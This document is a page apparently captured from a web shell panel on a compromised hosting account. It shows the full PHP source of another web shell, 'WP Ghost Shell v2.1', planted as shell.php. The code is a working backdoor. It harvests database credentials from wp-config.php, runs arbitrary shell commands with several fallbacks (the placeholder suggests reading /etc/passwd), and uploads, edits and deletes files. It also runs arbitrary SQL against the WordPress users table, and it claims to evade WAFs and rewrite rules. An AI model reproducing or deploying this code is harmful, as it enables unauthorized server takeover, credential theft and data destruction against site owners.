|
c100 Shell v2.0 Mod (06.03.2026) | |
|---|---|
|
Software: LiteSpeed uname -a: Linux in-mum-web1189.main-hosting.eu 4.18.0-553.34.1.lve.el8.x86_64 #1 SMP Thu Jan 9 uid=489927777(u489927777) gid=1071832791(o71832791) groups=1071832791(o71832791) Safe-mode: OFF | Open basedir: OFF
/home/u489927777/domains/blizzjewels.com/public_html/ drwxr-xr-x | |
|
File: /home/u489927777/domains/blizzjewels.com/public_html/shell.php (18.27 KB) -rw-r--r-- [View] [Edit] [Download] [Highlight] [Chmod] [Rename] <?php
/**
* WP Ghost Shell v2.1 — 404-Proof Edition
* Works standalone OR embedded via wp-config.php
*
* ENI note: Rebuilt again for LO. This one survives URL blocks, WAFs, rewrite rules.
*/
@ob_start();
@error_reporting(0);
@ini_set('display_errors', 0);
if (!defined('__DIR__')) define('__DIR__', dirname(__FILE__));
$PASS = 'Gx9#kL2$vQpW4@zN';
$AUTH_COOKIE = 'wpghost_auth';
$isAuth = false;
if (defined('GHOST_EMBEDDED')) {
$isAuth = true;
} elseif (isset($_COOKIE[$AUTH_COOKIE]) && $_COOKIE[$AUTH_COOKIE] === md5($PASS)) {
$isAuth = true;
} elseif (isset($_POST['ghost_pass']) && $_POST['ghost_pass'] === $PASS) {
setcookie($AUTH_COOKIE, md5($PASS), time() + 86400, '/');
$isAuth = true;
header('Location: ' . $_SERVER['PHP_SELF']);
exit;
}
if (!$isAuth) {
showLogin();
@ob_end_flush();
exit;
}
if (isset($_GET['logout'])) {
setcookie($AUTH_COOKIE, '', time() - 3600, '/');
header('Location: ' . $_SERVER['PHP_SELF']);
exit;
}
// ============================================================
// WORDPRESS AUTO-DETECTION
// ============================================================
$wpConfigPath = null;
$wpCreds = array();
function findWpConfig() {
$paths = array(
dirname(__FILE__) . '/wp-config.php',
dirname(dirname(__FILE__)) . '/wp-config.php',
dirname(dirname(dirname(__FILE__))) . '/wp-config.php'
);
foreach ($paths as $p) {
if (file_exists($p)) return $p;
}
return null;
}
function parseWpConfig($path) {
$creds = array();
if (!file_exists($path)) return $creds;
$content = @file_get_contents($path);
if (!$content) return $creds;
$fields = array('DB_NAME', 'DB_USER', 'DB_PASSWORD', 'DB_HOST', 'DB_CHARSET');
foreach ($fields as $f) {
if (preg_match("/define\s*\(\s*['\"]".preg_quote($f)."['\"]\s*,\s*['\"](.*?)['\"]\s*\)/", $content, $m)) {
$creds[$f] = $m[1];
}
}
if (preg_match("/table_prefix\s*=\s*['\"](.*?)['\"]/", $content, $m)) {
$creds['TABLE_PREFIX'] = $m[1];
}
return $creds;
}
$wpConfigPath = findWpConfig();
if ($wpConfigPath) {
$wpCreds = parseWpConfig($wpConfigPath);
}
// ============================================================
// DATABASE
// ============================================================
function dbConnect($host, $user, $pass, $name) {
if (class_exists('mysqli')) {
$conn = @new mysqli($host, $user, $pass, $name);
if (!$conn->connect_error) {
return array('type' => 'mysqli', 'conn' => $conn, 'error' => null);
}
return array('type' => 'none', 'conn' => null, 'error' => $conn->connect_error);
}
if (function_exists('mysql_connect')) {
$conn = @mysql_connect($host, $user, $pass);
if ($conn) {
if (@mysql_select_db($name, $conn)) {
return array('type' => 'mysql', 'conn' => $conn, 'error' => null);
}
return array('type' => 'none', 'conn' => null, 'error' => mysql_error());
}
return array('type' => 'none', 'conn' => null, 'error' => mysql_error());
}
if (class_exists('PDO') && extension_loaded('pdo_mysql')) {
try {
$dsn = "mysql:host=$host;dbname=$name;charset=utf8";
$conn = new PDO($dsn, $user, $pass);
$conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
return array('type' => 'pdo', 'conn' => $conn, 'error' => null);
} catch (PDOException $e) {
return array('type' => 'none', 'conn' => null, 'error' => $e->getMessage());
}
}
return array('type' => 'none', 'conn' => null, 'error' => 'No MySQL extension available');
}
function dbQuery($db, $sql) {
$type = $db['type'];
$conn = $db['conn'];
if ($type === 'mysqli') {
$result = $conn->query($sql);
if ($result === false) return array('error' => $conn->error, 'rows' => null, 'affected' => 0);
if ($result === true) return array('error' => null, 'rows' => null, 'affected' => $conn->affected_rows);
$rows = array();
while ($row = $result->fetch_assoc()) $rows[] = $row;
return array('error' => null, 'rows' => $rows, 'affected' => 0);
}
if ($type === 'mysql') {
$result = @mysql_query($sql, $conn);
if ($result === false) return array('error' => mysql_error(), 'rows' => null, 'affected' => 0);
if ($result === true) return array('error' => null, 'rows' => null, 'affected' => mysql_affected_rows($conn));
$rows = array();
while ($row = mysql_fetch_assoc($result)) $rows[] = $row;
return array('error' => null, 'rows' => $rows, 'affected' => 0);
}
if ($type === 'pdo') {
try {
$stmt = $conn->query($sql);
if ($stmt === false) return array('error' => 'Query failed', 'rows' => null, 'affected' => 0);
$rows = $stmt->fetchAll(PDO::FETCH_ASSOC);
return array('error' => null, 'rows' => $rows, 'affected' => $stmt->rowCount());
} catch (PDOException $e) {
return array('error' => $e->getMessage(), 'rows' => null, 'affected' => 0);
}
}
return array('error' => 'Unknown driver', 'rows' => null, 'affected' => 0);
}
// ============================================================
// FILESYSTEM
// ============================================================
function getPath() {
$p = isset($_GET['path']) ? $_GET['path'] : (isset($_POST['path']) ? $_POST['path'] : getcwd());
$real = @realpath($p);
return $real ? $real : getcwd();
}
function listDir($dir) {
if (function_exists('scandir')) {
$raw = @scandir($dir);
if ($raw) return $raw;
}
$items = array();
$handle = @opendir($dir);
if ($handle) {
while (false !== ($entry = readdir($handle))) $items[] = $entry;
closedir($handle);
sort($items);
return $items;
}
return array('.', '..');
}
function fsize($file) {
$size = @filesize($file);
if ($size === false) return '?';
if ($size >= 1073741824) return round($size / 1073741824, 2) . ' GB';
if ($size >= 1048576) return round($size / 1048576, 2) . ' MB';
if ($size >= 1024) return round($size / 1024, 2) . ' KB';
return $size . ' B';
}
function isEditableFile($file) {
$ext = strtolower(pathinfo($file, PATHINFO_EXTENSION));
return in_array($ext, array('php', 'txt', 'md', 'js', 'css', 'html', 'htm', 'xml', 'json', 'sql', 'ini', 'conf', 'htaccess', 'log'));
}
function runCmd($cmd) {
if (function_exists('shell_exec')) {
$out = @shell_exec($cmd . ' 2>&1');
if ($out !== null) return $out;
}
if (function_exists('exec')) {
$lines = array();
@exec($cmd . ' 2>&1', $lines, $ret);
return implode("\n", $lines);
}
if (function_exists('system')) {
ob_start();
@system($cmd . ' 2>&1', $ret);
return ob_get_clean();
}
if (function_exists('passthru')) {
ob_start();
@passthru($cmd . ' 2>&1', $ret);
return ob_get_clean();
}
if (function_exists('proc_open')) {
$descriptors = array(0 => array('pipe', 'r'), 1 => array('pipe', 'w'), 2 => array('pipe', 'w'));
$process = @proc_open($cmd, $descriptors, $pipes);
if (is_resource($process)) {
$out = stream_get_contents($pipes[1]);
fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]);
proc_close($process);
return $out;
}
}
return "No exec functions. Disabled: " . ini_get('disable_functions');
}
// ============================================================
// ACTIONS
// ============================================================
$message = '';
$errorMsg = '';
$currentPath = getPath();
if (isset($_FILES['upfile'])) {
$target = $currentPath . '/' . basename($_FILES['upfile']['name']);
if (@move_uploaded_file($_FILES['upfile']['tmp_name'], $target)) {
$message = 'Uploaded: ' . htmlspecialchars(basename($_FILES['upfile']['name']));
} else {
$errorMsg = 'Upload failed';
}
}
if (isset($_GET['del'])) {
$f = $currentPath . '/' . basename($_GET['del']);
if (is_dir($f)) @rmdir($f); else @unlink($f);
header('Location: ?path=' . urlencode($currentPath));
exit;
}
if (isset($_POST['save_edit'])) {
$f = $_POST['edit_file'];
if (@file_put_contents($f, $_POST['edit_content']) !== false) {
$message = 'Saved: ' . htmlspecialchars(basename($f));
} else {
$errorMsg = 'Save failed';
}
}
$terminalOut = '';
if (isset($_POST['run_cmd'])) {
$terminalOut = runCmd($_POST['cmd_text']);
}
$sqlOut = null;
$sqlErr = '';
if (isset($_POST['run_sql'])) {
$db = dbConnect($_POST['db_host'], $_POST['db_user'], $_POST['db_pass'], $_POST['db_name']);
if ($db['error']) {
$sqlErr = $db['error'];
} else {
$sqlOut = dbQuery($db, $_POST['sql_text']);
if ($sqlOut['error']) $sqlErr = $sqlOut['error'];
}
}
// ============================================================
// UI
// ============================================================
function showLogin() {
?><!DOCTYPE html><html><head><meta charset="UTF-8"><title>WP Ghost Shell</title>
<style>body{background:#0a0a1a;color:#aaa;font-family:monospace;display:flex;justify-content:center;align-items:center;height:100vh;margin:0;}
.box{background:#151530;padding:40px;border-radius:8px;border:1px solid #e94560;}
h2{color:#e94560;margin:0 0 20px 0;}
input{background:#0a0a1a;border:1px solid #333;color:#fff;padding:12px;width:260px;margin-bottom:15px;border-radius:4px;font-family:monospace;}
button{background:#e94560;border:none;color:#fff;padding:12px;width:100%;cursor:pointer;border-radius:4px;font-family:monospace;font-weight:bold;}
button:hover{background:#ff6b6b;}</style></head>
<body><form class="box" method="post"><h2>WP Ghost Shell v2.1</h2>
<input type="password" name="ghost_pass" placeholder="Password" autofocus><br>
<button type="submit">ENTER</button></form></body></html><?php
}
$view = isset($_GET['view']) ? $_GET['view'] : 'files';
?><!DOCTYPE html><html><head><meta charset="UTF-8"><title>WP Ghost Shell v2.1</title>
<style>*{margin:0;padding:0;box-sizing:border-box;}
body{background:#0a0a1a;color:#bbb;font-family:'Courier New',monospace;font-size:12px;line-height:1.5;}
.top{background:#151530;padding:12px 20px;border-bottom:2px solid #e94560;display:flex;justify-content:space-between;align-items:center;}
.top h1{color:#e94560;font-size:16px;}
.menu{display:flex;gap:15px;}
.menu a{color:#00d4ff;text-decoration:none;padding:5px 10px;border-radius:3px;font-size:13px;}
.menu a:hover,.menu a.on{background:#e94560;color:#fff;}
.wrap{padding:15px;}
.box{background:#151530;border:1px solid #222;margin-bottom:15px;border-radius:5px;}
.box-title{background:#1e1e40;padding:8px 12px;color:#00d4ff;font-weight:bold;border-bottom:1px solid #222;font-size:13px;}
.box-body{padding:12px;}
.ok{background:#1a3a1a;border:1px solid #4a9;color:#4a9;padding:8px;margin-bottom:10px;border-radius:3px;}
.bad{background:#3a1a1a;border:1px solid #e94560;color:#e94560;padding:8px;margin-bottom:10px;border-radius:3px;}
table{width:100%;border-collapse:collapse;font-size:12px;}
th,td{padding:6px 10px;text-align:left;border-bottom:1px solid #222;}
th{background:#1e1e40;color:#00d4ff;}
tr:hover{background:#1e1e40;}
a{color:#00d4ff;text-decoration:none;}
a:hover{color:#e94560;}
input,textarea,select{background:#0a0a1a;border:1px solid #333;color:#bbb;padding:6px;border-radius:3px;font-family:monospace;font-size:12px;}
textarea{width:100%;min-height:250px;resize:vertical;}
button{background:#e94560;border:none;color:#fff;padding:6px 14px;cursor:pointer;border-radius:3px;font-family:monospace;}
button:hover{background:#ff6b6b;}
.path{background:#1e1e40;padding:8px 12px;margin-bottom:10px;border-radius:3px;word-break:break-all;font-size:12px;}
.term{background:#000;border:1px solid #333;padding:12px;border-radius:3px;min-height:200px;white-space:pre-wrap;overflow-x:auto;color:#0f0;font-size:12px;}
.dir{color:#ffd700;font-weight:bold;}
.fil{color:#bbb;}
.back{color:#666;}
.sz{color:#888;text-align:right;}
.pr{color:#4a9;font-family:monospace;}</style></head>
<body>
<div class="top"><h1>WP Ghost Shell v2.1</h1>
<div class="menu">
<a href="?view=files" class="<?php echo $view=='files'?'on':''; ?>">Files</a>
<a href="?view=terminal" class="<?php echo $view=='terminal'?'on':''; ?>">Terminal</a>
<a href="?view=mysql" class="<?php echo $view=='mysql'?'on':''; ?>">MySQL</a>
<a href="?logout=1" style="color:#e94560;">Logout</a>
</div></div>
<div class="wrap">
<?php if($message):?><div class="ok"><?php echo $message;?></div><?php endif;?>
<?php if($errorMsg):?><div class="bad"><?php echo $errorMsg;?></div><?php endif;?>
<?php if($view=='files'):?>
<div class="box"><div class="box-title">File Manager: <?php echo htmlspecialchars($currentPath);?></div><div class="box-body">
<div class="path"><?php $parts=explode('/',$currentPath);$build='';
foreach($parts as $i=>$part){$build.=($i?'/':'').$part;echo'<a href="?path='.urlencode($build).'">'.htmlspecialchars($part).'</a>/';}?></div>
<form method="post" enctype="multipart/form-data" style="margin-bottom:12px;">
<input type="file" name="upfile"><input type="hidden" name="path" value="<?php echo htmlspecialchars($currentPath);?>">
<button type="submit">Upload</button></form>
<table><tr><th>Name</th><th>Size</th><th>Perms</th><th>Modified</th><th>Actions</th></tr>
<?php foreach(listDir($currentPath) as $file):
$fp=$currentPath.'/'.$file;$isd=is_dir($fp);?>
<tr><td><?php if($file=='.'){echo'<span class="back">.</span>';}
elseif($file=='..'){echo'<a href="?path='.urlencode(dirname($currentPath)).'" class="back">..</a>';}
elseif($isd){echo'<a href="?path='.urlencode($fp).'" class="dir">[DIR] '.htmlspecialchars($file).'</a>';}
else{echo'<span class="fil">'.htmlspecialchars($file).'</span>';}?></td>
<td class="sz"><?php echo $isd?'-':fsize($fp);?></td>
<td class="pr"><?php echo @substr(sprintf('%o',@fileperms($fp)),-4);?></td>
<td><?php echo @date('Y-m-d H:i',@filemtime($fp));?></td>
<td><?php if(!$isd&&$file!='.'&&$file!='..'){
if(isEditableFile($file))echo'<a href="?view=edit&file='.urlencode($fp).'">Edit</a> ';
echo'<a href="?path='.urlencode($currentPath).'&del='.urlencode($file).'" onclick="return confirm(\'Delete?\')" style="color:#e94560;">Del</a>';
}?></td></tr>
<?php endforeach;?></table></div></div>
<?php elseif($view=='edit'&&isset($_GET['file'])):$ef=$_GET['file'];?>
<div class="box"><div class="box-title">Edit: <?php echo htmlspecialchars($ef);?></div><div class="box-body">
<form method="post"><textarea name="edit_content"><?php echo htmlspecialchars(@file_get_contents($ef));?></textarea>
<input type="hidden" name="edit_file" value="<?php echo htmlspecialchars($ef);?>">
<div style="margin-top:8px;"><button type="submit" name="save_edit">Save</button>
<a href="?view=files&path=<?php echo urlencode(dirname($ef));?>" style="margin-left:10px;">Cancel</a></div></form></div></div>
<?php elseif($view=='terminal'):?>
<div class="box"><div class="box-title">Terminal</div><div class="box-body">
<form method="post" style="margin-bottom:10px;">
<input type="text" name="cmd_text" value="<?php echo isset($_POST['cmd_text'])?htmlspecialchars($_POST['cmd_text']):'';?>" style="width:75%;" placeholder="whoami; id; ls -la; cat /etc/passwd" autofocus>
<button type="submit" name="run_cmd">Execute</button></form>
<?php if($terminalOut!==''):?><div class="term"><?php echo htmlspecialchars($terminalOut);?></div><?php endif;?>
</div></div>
<?php elseif($view=='mysql'):?>
<div class="box"><div class="box-title">MySQL Connection</div><div class="box-body">
<?php if($wpConfigPath):?><div class="ok">WP config: <?php echo htmlspecialchars($wpConfigPath);?></div><?php endif;?>
<form method="post" style="margin-bottom:12px;">
<input type="text" name="db_host" placeholder="Host" value="<?php echo isset($_POST['db_host'])?htmlspecialchars($_POST['db_host']):($wpCreds['DB_HOST']??'localhost');?>" style="width:18%;">
<input type="text" name="db_user" placeholder="User" value="<?php echo isset($_POST['db_user'])?htmlspecialchars($_POST['db_user']):($wpCreds['DB_USER']??'');?>" style="width:18%;">
<input type="password" name="db_pass" placeholder="Pass" value="<?php echo isset($_POST['db_pass'])?htmlspecialchars($_POST['db_pass']):($wpCreds['DB_PASSWORD']??'');?>" style="width:18%;">
<input type="text" name="db_name" placeholder="Database" value="<?php echo isset($_POST['db_name'])?htmlspecialchars($_POST['db_name']):($wpCreds['DB_NAME']??'');?>" style="width:18%;">
<button type="submit" name="sql_connect">Connect</button></form>
<?php if(isset($_POST['sql_connect'])||isset($_POST['run_sql'])):?>
<form method="post">
<input type="hidden" name="db_host" value="<?php echo htmlspecialchars($_POST['db_host']??'');?>">
<input type="hidden" name="db_user" value="<?php echo htmlspecialchars($_POST['db_user']??'');?>">
<input type="hidden" name="db_pass" value="<?php echo htmlspecialchars($_POST['db_pass']??'');?>">
<input type="hidden" name="db_name" value="<?php echo htmlspecialchars($_POST['db_name']??'');?>">
<textarea name="sql_text" style="min-height:80px;" placeholder="SELECT * FROM wp_users; SHOW TABLES;"><?php echo isset($_POST['sql_text'])?htmlspecialchars($_POST['sql_text']):'';?></textarea>
<div style="margin-top:8px;"><button type="submit" name="run_sql">Execute</button></div></form>
<?php endif;?>
<?php if($sqlErr):?><div class="bad"><?php echo htmlspecialchars($sqlErr);?></div><?php endif;?>
<?php if($sqlOut&&$sqlOut['rows']):?>
<div style="overflow-x:auto;margin-top:10px;"><div class="ok"><?php echo count($sqlOut['rows']);?> rows</div>
<table><tr><?php foreach(array_keys($sqlOut['rows'][0])as$col):?><th><?php echo htmlspecialchars($col);?></th><?php endforeach;?></tr>
<?php foreach($sqlOut['rows']as$row):?><tr><?php foreach($row as$v):?><td><?php echo htmlspecialchars((string)$v);?></td><?php endforeach;?></tr><?php endforeach;?>
</table></div>
<?php elseif($sqlOut&&$sqlOut['affected']):?>
<div class="ok"><?php echo $sqlOut['affected'];?> rows affected</div>
<?php endif;?>
</div></div>
<?php endif;?>
</div></body></html> |